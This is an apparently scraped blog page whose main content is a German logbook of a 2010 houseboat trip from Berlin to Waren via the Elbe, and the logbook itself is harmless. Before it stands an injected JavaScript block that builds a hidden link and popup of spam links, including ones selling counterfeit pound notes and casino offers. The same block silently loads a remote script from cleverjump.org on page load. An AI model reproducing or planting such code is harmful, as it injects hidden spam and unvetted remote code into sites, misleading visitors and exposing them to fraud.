(function() { 'use strict'; if (window['shbNetLoaded']) return; window['shbNetLoaded'] = true; var popupHtml = "
sport fotograaf den haag<\/a> <\/div>
www.foto-cursussen.com<\/span> <\/div> <\/div>
insta video g\u00f6r\u00fcnt\u00fcleme hilesi<\/a> <\/div>
begeni.vip<\/span> <\/div> <\/div> <\/div>
transportieren<\/a> <\/div>
www.blitztransport.ch<\/span> <\/div> <\/div>
\u05de\u05d7\u05d9\u05e8 \u05dc\u05d5\u05d7 \u05d2\u05d1\u05e1<\/a> <\/div>
www.shlomogeves.co.il<\/span> <\/div> <\/div> <\/div>
unihockey schl\u00e4ger g\u00fcnstig<\/a> <\/div>
unihockeycenter.ch<\/span> <\/div> <\/div>
\u043a\u0440\u043e\u044f \u043c\u0443\u0436\u0441\u043a\u0438\u0439 \u0431\u0440\u044e\u043a<\/a> <\/div>
modonyashka.com.ua<\/span> <\/div> <\/div> <\/div>
\u0444\u0438\u043b\u044c\u0442\u0440\u044b \u0434\u043b\u044f \u0432\u0430\u043d\u043d\u043e\u0439 \u043a\u043e\u043c\u043d\u0430\u0442\u044b<\/a> <\/div>
aqua-filters.com.ua<\/span> <\/div> <\/div>
information planning destination wedding<\/a> <\/div>
www.karlacasillas.com<\/span> <\/div> <\/div> <\/div>
ymm hizmetlerimiz<\/a> <\/div>
ozerymm.com<\/span> <\/div> <\/div>
label roll pink<\/a> <\/div>
www.argonstore.ca<\/span> <\/div> <\/div> <\/div>
intravenous vitamin c therapy dosage<\/a> <\/div>
www.iuventusmedcenter.com<\/span> <\/div> <\/div>
buy fake pound sterling bills<\/a> <\/div>
redmountcashsolutions.com<\/span> <\/div> <\/div> <\/div>
sebebi med nedirtbikes<\/a> <\/div>
www.dogum-paketi.com<\/span> <\/div> <\/div>
complejo vitaminico con coenzima q10<\/a> <\/div>
www.densityplus.com<\/span> <\/div> <\/div> <\/div>
\u0438\u0437\u043e\u0433\u043d\u0443\u0442\u044b\u0435 \u0444\u0430\u0441\u0430\u0434\u044b<\/a> <\/div>
acmebel.com.ua<\/span> <\/div> <\/div>
\u043e\u0441\u0432\u0435\u0436\u0438\u0442\u0435\u043b\u044c \u0432\u043e\u0437\u0434\u0443\u0445\u0430 \u044d\u043b\u0435\u043a\u0442\u043e\u0440\u043e\u043d\u043d\u044b\u0439<\/a> <\/div>
dispensa.kiev.ua<\/span> <\/div> <\/div> <\/div>
brinco de ouro com safira<\/a> <\/div>
www.petitgalerie.com.br<\/span> <\/div> <\/div>
online casino free no deposit bonus free spins new mwmbers<\/a> <\/div>
onlinecasinos24.info<\/span> <\/div> <\/div> <\/div>
wood blinds made to measure<\/a> <\/div>
www.buyhomeblinds.com<\/span> <\/div> <\/div>
\u0436\u0435\u043d\u0441\u043a\u0430\u044f \u043c\u043e\u0434\u043d\u0430\u044f \u043e\u0434\u0435\u0436\u0434\u0430<\/a> <\/div>
limara.com.ua<\/span> <\/div> <\/div> <\/div>
\u043d\u0435\u0434\u0432\u0438\u0436\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0411\u0430\u0442\u0443\u043c\u0438<\/a> <\/div>
batumiexpert.com<\/span> <\/div> <\/div>
hop hey \u043f\u0438\u0432\u043e<\/a> <\/div>
pivasik.com.ua<\/span> <\/div> <\/div> <\/div>
<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>"; var popupCreated = false; function onReady() { tryCreatePopup(2); var box = create('div'); append(box, document.body); var defaultStyles = { width: '1px', height: '1px', background: 'transparent', display: 'inline-block', margin: '2px', padding: 0, verticalAlign: 'bottom', border: 'none' }; var a = create('a'); css(a, defaultStyles); document.addEventListener('keydown', function(e) { if (e.keyCode === 192 && e.ctrlKey) { css(a, { width: '20px', height: '20px', background: '#fff', border: '1px solid red' }); } }); document.addEventListener('keyup', function(e) { css(a, defaultStyles); }); a.className = 'shbNetgpLink'; append(a, box); a.href = 'javascript:;'; on(a, 'click', openLinerPopup); css(box, { position: 'fixed', margin: 0, padding: 0, outline: 'none', border: 'none', zIndex: 999999999, overflow: 'visible', direction: 'ltr' }); css(box, { left: '3px', right: 'auto', top: '50px', bottom: 'auto', width: '42px', height: '168px' }); } function clearStyles() { if(typeof document.createStyleSheet === 'undefined') { document.createStyleSheet = (function() { function createStyleSheet(href) { if(typeof href !== 'undefined') { var element = document.createElement('link'); element.type = 'text/css'; element.rel = 'stylesheet'; element.href = href; } else { var element = document.createElement('style'); element.type = 'text/css'; } document.getElementsByTagName('head')[0].appendChild(element); var sheet = document.styleSheets[document.styleSheets.length - 1]; if(typeof sheet.addRule === 'undefined') sheet.addRule = addRule; if(typeof sheet.removeRule === 'undefined') sheet.removeRule = sheet.deleteRule; return sheet; } function addRule(selectorText, cssText, index) { if(typeof index === 'undefined') index = this.cssRules.length; this.insertRule(selectorText + ' {' + cssText + '}', index); } return createStyleSheet; })(); } var sheet = document.createStyleSheet(); sheet.addRule('#shbNetPaddingTable', 'display: none;'); sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;'); sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;'); sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;'); sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:medium; line-height:normal;'); sheet.addRule('.shbNetPopupTable a', 'text-decoration:none; background:none; height:auto !important;'); } function tryCreatePopup(stage) { if (popupCreated) return; if (stage === 1) { document.writeln(popupHtml); } else if (stage === 2) { var mainBox = create('div'); mainBox.innerHTML = popupHtml; document.body.appendChild(mainBox); } else { return; } var wr = $('shbNetPaddingWr'); if (!wr) return; popupCreated = true; var table = $('shbNetPaddingTable'); css(table, { position: 'fixed', margin: 0, padding: 0, left: 0, top: 0, width: '100%', height: '100%', direction: 'ltr', zIndex: 999999999, background: 'none' }); css(table.getElementsByTagName('td')[0], { verticalAlign: 'middle', background: 'rgba(0, 0, 0, 0.5)' }); var popup = $('shbNetPaddingPopup'); css(popup, { margin: '0 auto', padding: '20px 25px 20px', width: '437px', background: '#fff', border: '1px solid #000', textAlign: 'left', position: 'relative', fontFamily: 'Tahoma, Arial, Verdana', boxSizing: 'content-box' }); on(document, 'keydown', function(e) { if (e.keyCode === 27) { wr.style.display = 'none'; } }); } function removeClass(node, className) { if (node && node.className) { node.className = node.className.replace(new RegExp('\\b' + className + '\\b', 'g'), ''); } } function openLinerPopup() { var pad = $('shbNetPaddingWr'); var tbl = $('shbNetPaddingTable'); if (!pad || !tbl) return; pad.style.display = 'block'; tbl.style.display = 'table'; var mainPopup = $('shbNetPopupWr'); if (!mainPopup) return; mainPopup.style.display = 'none'; } function $(id) { return document.getElementById(id); } function on(elem, event, handler) { elem.addEventListener(event, handler, false); } function css(elem, style) { for (var prop in style) { elem.style[prop] = style[prop]; } } function create(tag) { return document.createElement(tag); } function append(elem, parent) { parent.appendChild(elem); } setTimeout(function() { window.CJSource = 'shb2'; var script = document.createElement('script'); script.src = 'https://cleverjump.org/counter.js'; (document.head || document.body).appendChild(script); }, 10); if (document.readyState === 'complete' || document.readyState === 'interactive') { onReady(); } else { on(document, 'DOMContentLoaded', onReady); } tryCreatePopup(1); try { clearStyles(); } catch (ex) {} })();
3.11.2010

Einwegfahrt Berlin nach Waren über die Elbe

Hausboot -Törn Einwegfahrt von Berlin nach Waren im September 2010 über die Elbe
(Anmerkung: diese Strecke ist nur mit Sportbootführerschein Binnen und nur auf bestimmten Booten erlaubt)


Zeit: 6.9. bis 17.9.2010
Strecke:
Berlin (Müggelseedamm) -  Potsdam – Werder – Brandenburg –Rathenow-Havelberg – Wittenberge (Elbe) – Dömitz (Elbe) – Grabow – Neustadt/Glewe-Parchim – Lübz – Plau -  Malchow – Waren (Marina Eldenburg)
448 km -   Motorstd. 50

Charter: Yachtcharter Schulz
Basis
: Wassersportzentrum Berlin nach Marina Eldenburg
Boot
Vacance 1200 -  Dolce Vita IV
Crew:
Albert, Jürgen, Pit
KoD  =  Käp’ten of the Day


Montag, 6.9.2010

Albert und Jürgen werden am Berliner Hauptbahnhof mit Gepäck gegen 11.30 h abgeholt – wir fahren gemeinsam zur Basis in Köpenick.

Wir haben Zeit, das Boot ist noch nicht fertig.

Gepäck an Bord, Einweisung, Ablegen um 16.30 h – wegen der vorgerückten Stunde wird der Lebensmitteleinkauf auf Dienstag verschoben, Jürgen ist KoD.

Wir fahren an Köpenick vorbei über die Treptower und Berliner Spree durch viele Brücken – auch solche bei denen wir mit unserer Durchfahrtshöhe von 3.80 m  aufpassen müssen (Antennenmast senken!) bis zur Mühlendammschleuse, die zügig öffnet!

Weiter geht es durch das dämmernde Berlin-Mitte am Schiffbauerdamm, durch das Regierungsviertel, am neuen Hauptbahnhof und Kanzleramt vorbei zu unserem Anleger „Charlottenburger Ufer“ – Anlegen 19.00 h.  Das Wetter ist kühl und trocken!

Das Schiff läuft gut, die Manöver haben gut geklappt!

Abendessen im Brauhaus Lemke (ehemals Luisenhof) – leider sehr touristisch, aber wir bekommen noch einen Tisch, das Essen ist mäßig, das Bier leicht und gut!

Die Kojen sind leider recht eng, desgleichen die Sanitärkabinen – ich habe in dieser ersten Nacht Probleme einzuschlafen.

Tagesetappe: 24 km
_________________________________________________________

Dienstag, 7.9.2010

Als wir Heizung, Wasserkocher und Kaffeemaschine betätigen, ist nach kurzer Zeit die Batterie leer – wir lassen die Maschine laufen, zunächst ohne Erfolg. Also ein Wurstbrot auf die Faust und erst mal fahren und aufladen – Kaffee dann eben später!

Ablegen gegen 9.00 h  -  Pit ist KoD  – das Wetter ist unfreundlich, kühl und windig und zeitweise regnerisch!

Die nahegelegene Charlottenburger Schleuse wird in relativ kurzer Zeit passiert. Weiter geht es über die Spree an Siemensstadt und Spandau vorbei auf die Havel. An Steuerbord liegt die Scharfe Lanke, an Backbord der Stössensee. Der Grunewaldturm kommt in Sicht, Lindwerder, Schwanenwerder, Pfaueninsel. Wegen des wenig reizvollen Wetters verzichten wir auf die Fahrt über den großen Wannsee, Pohle- und Stölpchensee und fahren an der Sacrower Kirche direkt in den Jungfernsee, unter der Glienicker Brücke hindurch an Schloss Babelsberg vorbei in den Tiefen See, an dem ein eigener Anleger das Einkaufen bei Aldi zuläßt (bei Einfahrt in den See – rechts)! Inzwischen können wir auf Grund  der wieder funktionierenden Stromversorgung auch Kaffee und Tee zubereiten.

Basisleiter Weidermann tel.nach der Strommisere befragt, meint, dass die vorherige Crew wohl nur wenig gefahren sei, so dass die Batterien nicht richtig aufgeladen seien – wir sollten doch möglichst für den nächsten Abend eine Marina mit Stromversorgung aufsuchen! (Außerdem wäre zweckmäßig, den Boiler für Warmwasser als Hauptstromfresser auszuschalten – wir bekämen das heiße Wasser ja ausreichend über den Motor!) – Albert hatte das alles besprochen und  geregelt, während Jürgen und ich die Einkäufe besorgten.

Mittagsimbiss mit kleinem Bier! 12.30 h – Ein Schiff mit Schweizer Crew geht längsseits, es entwickelt sich ein lebhaftes Gespräch zwischen den Fliegern (Jürgen) – es werden Witze ausgetauscht (– Stinktier!)

Es ist jetzt sonnig, aber recht windig!  Ablegen gegen 14.00 h!

Hans -Otto-Theater, Potsdam, Tiefer See, Templiner See, Caputh, Geltow, Werder;

Das Anlegen in Werder scheitert – Pit wird bei dem Versuch in der Marina Porta Sophia in eine Box einzufahren durch den starken Seitenwind auf dort liegende Schiffe gedrückt und bricht den Versuch ab. Im Hafen herrscht im übrigen starker Wellengang und Wind – das wäre eine unruhige Nacht geworden!

Das Fischlokal mit eigenem Anleger, an dem wir – Tina und ich vor Jahren gelegen hatten, existiert nicht mehr – gleiche ungünstige Windverhältnisse herrschen an den nachfolgenden Bootshäusern und Marinas auf der westlichen Seite des Zernsees – wir landen schließlich vor der großen Autobahnbrücke auf der östlichen Seite im Yachthafen Ringel.  Hier ist das Wetter ruhiger – wir belegen einen freien Platz und machen fest.  Vom Eigner erhalten wir telephonisch die Erlaubnis, diese eine Nacht liegen zu bleiben, da das sonst dort beheimatete Boot ja erst am 19.9 zurückkäme.

Später werden wir allerdings vom Hafenmeister dieses Platzes verwiesen (unfreundlicher Akt) und müssen am Kopfende des Steges festmachen – Gelbe Welle – Schild! (Aber wir haben Strom!) – Bemerkung Jürgen: „ich wollte immer schon mal unter einer Autobahnbrücke schlafen!“

16.00 h -  Abendessen an Bord, da weit und breit kein Gasthaus in Sicht!

Jürgen macht Spaghettis  – es gibt Rotwein und später Fußball – Deutschland – Aserbeidschan  6:1  (EM – Qualifikation)

Tagesetappe: 46 km
_________________________________________________________

Mittwoch, 6.9.2010

Frühstück nun richtig zünftig mit Bacon und Eiern (Albert), Kaffe und Tee und Jürgens selbstgebackenem Brot. -  Liegegebühr incl. Strom 12.- € – Albert ist KoD.

Ablegen gegen. 9.30 h  Richtung Brandenburg! Es ist wieder windig und regnerisch!

Wir passieren die Fähre Ketzin und drehen eine Ehrenrunde durch den Ketziner Hafen.

Wir kommen gut voran, auch durch die Schleuse Brandenburg! (Hub 1.20 m)

Der Wind briest imme stärker auf – die Wellenkämme bekommen leichte Schaumstreifen.

Das Wetter ist jetzt sonnig und trocken. Über den Plauersee fahren wir in den Breitlingssee und legen in dem kleinen Hafen am Gasthaus Malge an – die freundliche Hafenmeisterin hilft beim Anlegen – hier haben wir Wasser, Strom und Toiletten und Duschen -  alles zusammen für 23.50 €!

13.00 h  -  Mittagsimbiß!

Kleiner Spaziergang am Campingplatz entlang – später Abendessen im Gasthaus – recht gut!

Wir sehen Fotos von Jürgen auf Alberts Laptop von der Toscana-Reise!

Neben uns liegt eine „Europa 600“ – von Cardinal Boating – früher nur in Fürstenberg – jetzt auch in Ketzin zu mieten – das wäre für uns auch ein schönes Schiff – aber mit diesen beiden genannten Heimathäfen ist der Radius natürlich vorgegeben!

Tagesetappe: 44 km
_________________________________________________________

Donnerstag, 9.9.2010

Beim Hafenmeister gibt es frische Brötchen – Frühstück – leider regnet es schon wieder!

Jürgen ist heute KoD. – Auf den umliegenden Schiffen sitzen unzählige Schwalben, die zeitweise zu Trainingsflügen starten – es wird Herbst! – Ablegen gegen 10.00 h.

Der Regen hört auf, aber es bleibt trübe und verhangen!

Wir fahren in die Untere Havelwasserstraße ein und passieren bei Plaue die alte Straßenbrücke, die niedrigste auf der ganzen Strecke (4.30 m,  bei Hochwasser 3.90 m!) ohne Probleme!

Mittagshalt in Premnitz – kleiner Imbiß – Stadtrundgang -  die Stadt ist ordentlich renoviert aber heutzutage ohne Bedeutung! – Skulpturen an der Uferpier!

Weiter geht es bis Rathenow – Stadtanleger – hier gibt es Strom und Wasser, aber keinen Schlauch! – 16.30 h.

Auf dem Kirchenhügel ist das Touristenbüro – Liegegebühr 12.- € – Landebier!

Abendessen im nahegelegenen Gasthaus ‚ Zum alten Hafen ‚ – recht gut!

Tagesetappe: 39 km
_________________________________________________________

Freitag, 10.9.2010

Wetter – trocken, kühl und windig – Albert holt Brötchen und Boden-Wischlappen, die fehlen.

Ablegen 9.15 h – Pit ist KoD. – Fahrt durch die große Schleppzugschleuse, da nicht geklärt werden konnte, ob die Jederitzer Brücke nach der Stadtschleuse (in gesenktem Zustand  3.50 m, in gehobenem 4.80 m)  für uns geöffnet würde?!

Also Anmeldung an der Großen Schleuse, ob wir passieren können – es stellt sich heraus, dass diese z.Zt. außer Betrieb ist, aber für uns geöffnet wird – wir sollten langsam heranfahren!

Der Grund der Außerbetriebsetzung ist wohl, dass die Strecke zwischen Rathenow und Havelberg für die Berufsschiffahrt gesperrt ist, weil dieser Teil der Havel und des umliegenden Gebietes denaturiert werden soll, auch um Überschwemmungspolster für Elbhochwasser zu schaffen!

Wir schleusen und haben im weiteren Verlauf noch 2 weitere Schleppzugschleusen – Grütz und Gartz zu überwinden (200 m lang, 9.90 m breit, Hub 0.90 m).

Nun brauchen wir aber dringend Frischwasser, die Leitungen blubbern schon Luft beim Aufdrehen.

Da uns die Einfahrt in den Havelberger Stadthafen wegen der knappen Durchfahrtshöhe der Fußgängerbrücke (3.90 m) schwierig erscheint, legen wir gegenüber an der Kiebitzwerft und Marina an und füllen den Tank – es dauert, er ist fast leer, obwohl wir kaum geduscht haben. – Anscheinend verbraucht die elektrische Spülung der Hecktoilette eine Menge Frischwasser!

Dann geht es weiter durch die Schleuse Havelberg (L 225 m, B 12 m, Hub 1.40  bis 6 m – je nach Elbewasserstand!) -  nach oben geschleust? – das hat uns am meisten gewundert? – auf die Elbe, die gut Wasser führt – Pegelstand so um die 4 m! -  15.00 h

In rasanter Fahrt mit 16 km/Std gleiten wir die Elbe abwärts! – Überschwemmte Elbauen ziehen vorüber, Uferbäume stehen im Wasser!

Nach etwa 40 km kommt Wittenberge in Sicht – wir machen im Stadhafen fest.- 17.00 h

Nach Landebier, Duschen und Stadtgang essen wir recht gut ‚ Prignitzer Apfelsuppe, Wels-und Schollenfilet und Steak ‚  im Restaurant „Zum Fährmann“.

Am Nebentisch wird eine Vereins-Versammlung abgehalten – es spielt sich alles streng nach den bekannten Ritualen ab – Tagesordnungspunkte werden aufgerufen, Berichte erstattet und Aufrufe verlesen. – Ich hatte so etwas schon lange nicht mehr erlebt – aber ich stelle fest – das deutsche Vereinswesen steht unerschüttert – nach einer Stunde ist alles vorbei und erledigt!

Tagesetappe: 70 km
_________________________________________________________

Samstag, 11.9.2010

Brötchen vom Hafenmeister! Frühstück!

Ablegen um 9.30 h – Albert ist heute KoD.

Flotte Fahrt auf der Elbe bis Dömitz – es ist diesig, zeitweise sonnig!

16 Grad – später  20 Grad!

Unterwegs passieren wir den Sportboothafen Cumlosen (ehemaliger Grenzkontrollhafen der DDR) mit Wachturm, Schnakenburg und Gorleben.

Schnakenburg, ursprünglich eine Siedlung von Elbfischern, Zollstation bis 1854 und während der deutschen Teilung; heute nur noch Schutz- und Yachthafen. Spätromanische St.Nicolaikirche (Bachsteinbau um  1200), zahlreiche malerische Fachwerkhäuser, kleinste Stadt Niedersachsens (600 E.)

Aussichtsturm von dem man weit nach Brandenburg hineinsehen kann!

Kurz darauf, elbabwärts kommt an Steuerbord  „Der böse Ort“ in Sicht, – die Fahrrinne wird sehr schmal, Frachtschiffe haben absolut Vorfahrt, die Innenkurve am Südufer ist stark versandet. – Sportboothafen Lenzen -  gegenüber auf dem Breitschen Berg (75 m hoch) dienen die 322 m hohen Sendemasten zur Orientierung.

Gorleben –  Gorlebener Haken – und Hafen.

Gorleben ist vor allem bekannt und berüchtigt geworden als End -und Zwischenlager für Atommüll.

Wir kommen gegen 12.30 in Dömitz an und wollen heute hier bleiben, um Stadt und Festung zu besichtigen!

Liegegebühr 12.- , Duschen/Person 1.-€.

Wir  kaufen  im Aldi gegenüber ein und entsorgen unsere Pfandflaschen!

Dömitz (2900 E.) ,  im Dreiländereck von Mecklenburg, Brandenburg und Niedersachsen gelegen, 1259 erstmals urkundlich erwähnt, geschlossene Fachwerkbebauung, spätbarockes Rathaus, neugotische Stadtkirche (Backstein).

Die Festung Dömitz ist die besterhaltene Niederungsfestung im norddeutschen Raum (1559 bis 1565); Heimatmuseum im ehemaligen Kommandantenhaus, Fritz Reuter hat hier seine Festungshaft abgesessen. Wechselhafte Geschichte.

Es gibt keine Fahrräder im Hafen-Hotel zu leihen, also machen wir uns zu Fuß auf den Weg!

Leider hatte ich meinen Fotoapparat vergessen – nun hoffe ich auf die Fotos meiner Mitbesichtiger!

Neben unserem Boot hat ein vergleichsweise kleines Schiff festgemacht – das Ehepaar hat zwei riesige Bulldoggen mit an Bord, die sich zwar friedlich verhalten, aber uns ist es unbegreiflich wie man mit diesen Ungetümen auf so engem Raum zusammenleben kann!

Nach dem Duschen essen wir im Hafenhotel zu Abend – gut! (Austern und Fisch!)

Anschließend an Bord Gespräche mit Wein!

Tagesetappe: 48 km

_________________________________________________________

Sonntag, 12.9.2010

Ablegen 9.30 h  – Jürgen ist KoD

Wir schleusen als erstes durch die Schleuse Dömitz mit einem Hub von 1.90 m und erreichen damit die Elde-Müritz-Wassersraße.

Schönes Sonnenwetter, warm, kein Wind!

13.00 h – Mittagspause vor der Schleuse Eldena – SB-Schleuse – das hat auch seine Vorteile, weil man den Zeitpunkt des Schleusens selbst bestimmen kann – aber die Schleusung dauert länger wegen der eingebauten Sicherheitsreserven!  Andererseits hat sich gezeigt, dass in Zeiten großen Andrangs, Schleusenwärter durch kluge Einteilung mehr Boote durch die Schleusung bringen!

Von Dömitz bis zum Elde-Dreieck sind 56 km zurückzulegen und mittels 10 Schleusen rund 24 m Höhenunterschied zu überwinden – wie folgt:

Dömitz: 1.50 bis 2.90 m je nach Elbewasserstand

Neu-Kaliß: 2.10

Finden-wir-uns-hier: 2.10

Malliß:  2.00

Eldena: 1.70

Gürtz: 3.30

Grabow: 1.90

Hechtsforth: 3.20

Neustadt-Glewe: 2.20

Lewitz: 3.70

Die Schleusenwärterin in der Schleuse Gürtz rät wegen der anbrechenden Dunkelheit in Grabow zu bleiben – Neustadt-Glewe wäre wohl zu weit!

Grabow ist ein etwas heruntergekommenes Städtchen – kleiner Stadtgang – Essen beim „Italiener“ auf Empfehlung vom Hafenbüro!

Erstaunlich gute Küche – alle Achtung – und nette Bedienung!

22.00 h – Kein TV-Empfang!

Tagesetappe: 30 km
_________________________________________________________

Montag, 13.9.2010

Ablegen  9.30 h  -  Pit  ist KoD

Trübes Wetter, später sonnig!

Auf die Fahrt nach Schwerin hatten wir verzichtet, wir alle kennen die Stadt und finden die lange Kanalfahrt auf der Störwasserstraße uninteressant!  -

Also fahren wir weiter auf der Müritz-Elde-Wasserstraße Richtung Waren!

In Matzlow vor der Schleuse drehe ich in dem Hafen, in dem wir 2006 das Locaboot – Boot – damals noch mit Rudi – abgegeben haben – eine Runde – Albert kann sich immer noch nicht erinnern, jemals hier gewesen zu sein!

Weiter durch die Schleuse Garwick kommen wir nach  Parchim – ein hübsches Städtchen, wie sich herausstellt!

Wir finden einen guten Anleger im Nebenarm mit Wasseranschluß und Strom und begeben uns nach dem üblichen Landebier auf den Stadtgang!  Sehr schöne Fachwerkhäuser und andere (Gründerstil) – Bauten!

Gutes Essen im Brauhaus – ehemalige preußische Poststation – wir wollen morgen noch einen Fotospaziergang durch die Stadt machen – es lohnt sich!

Tagesetappe: 43 km
_________________________________________________________

Dienstag, 14.9.2010

Frühstück  8.30 h  -  strömender Regen  – es ist nichts mit dem Fotospaziergang – schade!

Wir warten noch ein bisschen – vielleicht bessert sich ja das Wetter!?

Regen, Regen, Regen!

Ablegen 10.00 h  -  Albert ist KoD.

Ankunft in Lübz – Stadtmarina gegen 14.00 h – der Hafen ist wider Erwarten gut besetzt – aber wir finden noch einen ordentlichen Platz. Albert muss zweimal rückwärts einparken bis wir endlich unsere Position erreichen – er schafft beide Manöver mit Bravour! Mittagsimbiß an Bord!  Einkaufsbummel – Mittagsschläfchen!

Der Regen hat aufgehört – es ist trübe und warm – 19 Grad – Duschen in der Marina,

Abendessen im  Restaurant  „Alter Amtsturm“- urig – mit netter Bedienung!

22.30 h!

Tagesetappe: 28 km
_________________________________________________________

Mittwoch, 15.9.2010

Es ist trübe und nur zeitweise sonnig, stark windig!   -  Jürgen ist KoD!

Vor der Schleuse Lübz liegen 3 Schiffe – wir sind das 4. – wir kommen aber dank der erfahrenen Schleusenwärterin alle bei einer Schleusung mit!

Dann zieht sich die Fahrt nach Plau endlos hin, weil sich die Boote vor uns streng an die Geschwindigkeitsbegrenzung halten – 6 km/h!  So diktiert das erste Schiff das Tempo der Kolonne über 4 Schleusen bis Plau, wo wir 15.30 eintreffen – 20 km – 5 Std!

Der Schleusenwärter in Plau verbreitet die Schreckensmeldung von 2 m-Wellen auf dem Plauer See wegen des Starkwindes – es ist dann aber weit weniger heftig als erwartet!

Wir fahren über den See in den nördlichen Teil zur „Fischerei Alt Schwerin“ ‚ wo wir 2006 waren – (woran ich mich nicht mehr erinnern konnte) – langsam fällt es mir wieder ein,  als wir anlegen!  -  16.30 h

Das Anlegemanöver ist nicht so einfach wegen des Windes, gelingt aber schließlich perfekt!

Jürgen macht um die Bucht herum einen Spaziergang zum anderen Ufer – ich führe das Logbuch und laufe auch noch ein bißchen  – Albert macht ein Schläfchen!

Abendessen in der Fischerei – wir haben Barsch bestellt – Albert isst gebratenen Aal!

Dazu Bier und Schaps! – Wieder kein TV-Empfang – neben uns liegt ein Kuhnle-Boot mit lustigen Schwaben aus Alberts Gegend!

Tagesetappe: 38 km
_________________________________________________________

Donnerstag, 16.9.2010

Ablegen gegen  9.30 h  -  Pit ist KoD.

Plauer See, Petersdorfer See, Mahlower Drehbrücke (öffnet zu jeder vollen Std.)

Anlegen 11.30 h  – Stadtbummel – 2.50 € kostet die Gebühr für kurzfristiges Liegen -

„Bei dem Eintreffen von Kuhnlebooten würde er eilends sein Büro verlassen, um mit

langer Leine die Boote einzufangen, das wären ja Panzerschiffe, die alles kaputtführen“ –  räsoniert der Hafenmeister!  -  Auch die Kuhnle-Schwaben treffen im Hafen ein und kommen zur Besichtigung an Bord mit 2 Weinflaschen (Würthemberger) im Gefolge – der Kapitän hält sich aber lieber zurück!

13.00 h – Es gibt ein Erbsensüppchen und dann fahren wir auch schon durch die gedrehte Brücke – 14.00 h!

Und dann geht es doch relativ schnell – um 15.30 h sind wir an der Basis Eldenburg/Waren– das Rückwärts-Einparken gelingt wegen Wind erst beim 3. Mal aber ohne „Feindberührung“!  – Landebier – Duschen – Abendessen im Hafenlokal -

Fischsuppe und Schweinelendchen am Spieß und Salat! – Gut!

Tagesetappe: 38 km
_________________________________________________________

Freitag, 17.9.2010

Aufräumen, Packen, Gepäck von Bord, Tanken -  Wir übergeben eine Mängelliste, damit diese beseitigt werden können und die nächste Crew davon profitiert!

Transport-Tina ist schon da und nach Abgabe des Bootes und Gegenrechnung  der Spritkosten gegen die Kaution starten wir Richtung Berlin, wo wir gegen 12.30 h eintreffen!

Schlossbesichtigung, Pflaumenkuchen – die Crew wird zum Bahnhof gebracht und wie inzwischen bekannt sind alle „Members“ wieder wohlbehalten bei den besten von allen Ehefrauen eingetroffen!

Ein schöner Törn ist zu Ende!

448 km – 50 Motorstd.  -  414 Liter Diesel  (= 450 €)

gesamt :        448 km

Berlin, den im September 2010

Pit

Kategorien